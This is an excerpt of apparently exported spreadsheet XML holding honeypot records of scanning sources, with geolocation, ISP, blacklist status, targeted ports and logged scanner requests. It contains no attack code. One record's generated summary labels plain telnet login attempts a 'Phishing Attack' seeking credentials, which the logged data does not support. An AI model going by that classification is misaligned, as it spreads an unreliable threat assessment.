    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7219:95fa"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1268"/>
    <x v="1268"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T07:06:39"/>
    <d v="2024-09-07T04:57:00"/>
    <d v="2025-04-18T07:06:39"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SNMP_H32&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;10295&amp;&amp;3306&amp;&amp;1433&amp;&amp;161"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam'&amp;&amp; 'exploits']}"/>
    <n v="76"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="business"/>
    <s v="Viettel Group"/>
    <s v="2005-05-05"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dce7:6b9c"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1269"/>
    <x v="1269"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T06:14:19"/>
    <d v="2025-02-26T20:28:37"/>
    <d v="2025-04-18T06:14:19"/>
    <n v="53"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Tsing Yi Town"/>
    <s v="1818483"/>
    <s v="NA"/>
    <s v="22.3484"/>
    <s v="114.112"/>
    <s v="9304"/>
    <s v="HGC Global Communications Limited"/>
    <s v="HGC Global Communications Limited"/>
    <s v="business"/>
    <s v="HGC Global Communications Limited"/>
    <s v="2010-08-05"/>
    <s v="HGCGLOBAL-HK"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:df10:35b1"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1270"/>
    <x v="1270"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T06:14:11"/>
    <d v="2025-04-17T02:36:31"/>
    <d v="2025-04-18T06:14:11"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1&amp;&amp;abuseipdb"/>
    <s v="8443&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="NSW"/>
    <s v="New South Wales"/>
    <s v="Sydney"/>
    <s v="Alexandria"/>
    <s v="2178136"/>
    <s v="2015"/>
    <s v="-33.9088"/>
    <s v="151.196"/>
    <s v="14061"/>
    <s v="DigitalOcean, LLC"/>
    <s v="DigitalOcean, LLC"/>
    <s v="hosting"/>
    <s v="DigitalOcean, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/ab2g'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/ab2h'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d126:1f32"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1271"/>
    <x v="1271"/>
    <s v="S0106d4e2cb5444ec.su.shawcable.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-18T06:13:22"/>
    <d v="2025-04-15T12:26:56"/>
    <d v="2025-04-18T06:13:22"/>
    <n v="73"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="CA"/>
    <s v="Canada"/>
    <s v="ON"/>
    <s v="Ontario"/>
    <s v="Algoma"/>
    <s v="Sault Ste. Marie"/>
    <s v="6141439"/>
    <s v="P6A"/>
    <s v="46.5136"/>
    <s v="-84.3358"/>
    <s v="6327"/>
    <s v="Shaw Communications Inc."/>
    <s v="Shaw Communications Inc."/>
    <s v="residential"/>
    <s v="Shaw Communications Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:464c:e1e9"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1272"/>
    <x v="1272"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T06:13:08"/>
    <d v="2025-04-16T03:39:32"/>
    <d v="2025-04-18T06:13:08"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&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NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:61e6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1273"/>
    <x v="1273"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T06:11:07"/>
    <d v="2025-04-15T07:37:11"/>
    <d v="2025-04-18T06:11:07"/>
    <n v="80"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Sarıyer"/>
    <s v="Şişli"/>
    <s v="739549"/>
    <s v="34381"/>
    <s v="41.1131"/>
    <s v="29.0245"/>
    <s v="44558"/>
    <s v="Netonline Bilisim Sirketi LTD"/>
    <s v="Vodafone-Turkey"/>
    <s v="cellular"/>
    <s v="Vodafone Telekomunikasyon A.S."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e6a:c06b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to gather sensitive information from various systems, including database credentials and system configurations. They are also trying to establish unauthorized connections to services such as FTP, HTTP, and HTTPS."/>
    <s v="Phishing Attack"/>
  </r>
  <r>
    <x v="1274"/>
    <x v="1274"/>
    <s v="83-85-234-111.cable.dynamic.v4.ziggo.nl&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-18T06:10:53"/>
    <d v="2025-03-13T15:17:40"/>
    <d v="2025-04-18T06:10:53"/>
    <n v="57"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="ZH"/>
    <s v="South Holland"/>
    <s v="Gemeente Den Haag"/>
    <s v="The Hague"/>
    <s v="2747373"/>
    <s v="2597"/>
    <s v="52.0705"/>
    <s v="4.3007"/>
    <s v="33915"/>
    <s v="Vodafone Libertel B.V."/>
    <s v="Vodafone Ziggo"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5355:ea6f"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1275"/>
    <x v="1275"/>
    <s v="113-61-241-36.veetime.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-18T06:10:27"/>
    <d v="2024-04-12T20:14:00"/>
    <d v="2025-04-18T06:10:27"/>
    <n v="338"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3412&amp;&amp;23&amp;&amp;51250&amp;&amp;9100&amp;&amp;80&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.163"/>
    <s v="120.675"/>
    <s v="17809"/>
    <s v="VEE TIME CORP."/>
    <s v="EMAX"/>
    <s v="business"/>
    <s v="e-MAX NETWORK CORP."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:713d:f124"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1276"/>
    <x v="1276"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T06:10:24"/>
    <d v="2023-08-08T12:40:00"/>
    <d v="2025-04-18T06:10:24"/>
    <n v="567"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_HTTP_H43&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;22&amp;&amp;80&amp;&amp;60513&amp;&amp;23&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0501"/>
    <s v="121.565"/>
    <s v="131596"/>
    <s v="TBC"/>
    <s v="TBC"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="TBCOM-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7bf0:7fb5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1277"/>
    <x v="1277"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T06:10:14"/>
    <d v="2025-04-14T20:32:45"/>
    <d v="2025-04-18T06:10:14"/>
    <n v="46"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London"/>
    <s v="2643743"/>
    <s v="WC2N"/>
    <s v="51.5077"/>
    <s v="-0.122556"/>
    <s v="201838"/>
    <s v="Community Fibre Limited"/>
    <s v="Community Fibre Limited"/>
    <s v="residential"/>
    <s v="Community Fibre Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a133:d0a3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1278"/>
    <x v="1278"/>
    <s v="NA&amp;&amp;110-24-36-60.adsl.fetnet.net"/>
    <x v="0"/>
    <d v="2025-04-18T06:03:55"/>
    <d v="2024-04-14T14:46:04"/>
    <d v="2025-04-18T06:03:55"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="47690&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="Banqiao District"/>
    <s v="1670029"/>
    <s v="NA"/>
    <s v="25.0114"/>
    <s v="121.462"/>
    <s v="9674"/>
    <s v="Far EastTone Telecommunication Co., Ltd."/>
    <s v="Far EasTone Telecommunication Co., Ltd."/>
    <s v="residential"/>
    <s v="FETNET"/>
    <s v="2009-02-23"/>
    <s v="FETNET-NET"/>
    <s v="None"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1999-09-10 03:35:57"/>
    <s v="2025-09-10 03:35:57"/>
    <s v="2023-09-08 10:24:41"/>
    <s v="['DNS01.FETNET.NET', 'DNS02.FETNET.NET']"/>
    <s v="Network Solutions, LLC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:6e18:243c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1279"/>
    <x v="1279"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T05:32:54"/>
    <d v="2025-03-01T01:06:53"/>
    <d v="2025-04-18T05:32:54"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c8:b1ae"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1280"/>
    <x v="1280"/>
    <s v="p57b69a5e.dip0.t-ipconnect.de&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-18T05:10:22"/>
    <d v="2025-04-14T19:41:01"/>
    <d v="2025-04-18T05:10:22"/>
    <n v="95"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="NW"/>
    <s v="North Rhine-Westphalia"/>
    <s v="Regierungsbezirk Münster"/>
    <s v="Schöppingen"/>
    <s v="2836390"/>
    <s v="NA"/>
    <s v="52.1"/>
    <s v="7.23333"/>
    <s v="3320"/>
    <s v="Deutsche Telekom AG"/>
    <s v="Deutsche Telekom AG"/>
    <s v="residential"/>
    <s v="Deutsche Telekom AG"/>
    <s v="NA"/>
    <s v="NA"/>
